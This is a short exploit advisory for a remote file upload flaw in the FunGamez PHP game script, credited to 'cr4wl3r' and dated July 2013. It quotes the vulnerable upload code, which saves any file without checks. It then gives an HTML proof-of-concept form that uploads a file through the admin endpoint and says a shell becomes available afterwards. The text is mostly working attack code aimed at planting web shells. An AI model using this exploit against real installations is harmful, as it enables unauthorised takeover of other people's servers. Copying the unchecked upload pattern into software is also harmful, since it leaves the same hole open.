# FunGamez Remote File Upload Vulnerability
# Brought to you by cr4wl3r http://bastardlabs.info
# Software Link: http://sourceforge.net/projects/fg-gsm/?source=dlp
Source [FunGamez]/admin/modules/game.php
136 }
137 Else If ( $mode == 'newsave' )
138 {
139 If ( $_FILES['src_upload']['name'] != '' && $_POST['src_link'] != '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=doublesrc'); die(); }
140 If ( ( $_FILES['src_upload']['name'] == '' && $_POST['src_link'] == '' ) || $_POST['name'] == '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=reqg'); die(); }
141 If ( $_FILES['src_upload']['name'] != '' )
142 {
143$src = $_FILES['src_upload']['name'];
144 move_uploaded_file($_FILES['src_upload']['tmp_name'], './data/flash/'.$_FILES['src_upload']['name']);
145 }
Proof of concept:
<form action="http://localhost/[FunGamez]/index.php?admin&module=game&mode=newsave" method="POST" enctype="multipart/form-data">
<input type="text" name="name" value="blablablablabla" /><br>
<input type="file" name="src_upload" /><br>
<input type="submit" value="w00tw00t" />
And your shell will be available here:
// Gorontalo 31 Juli 2013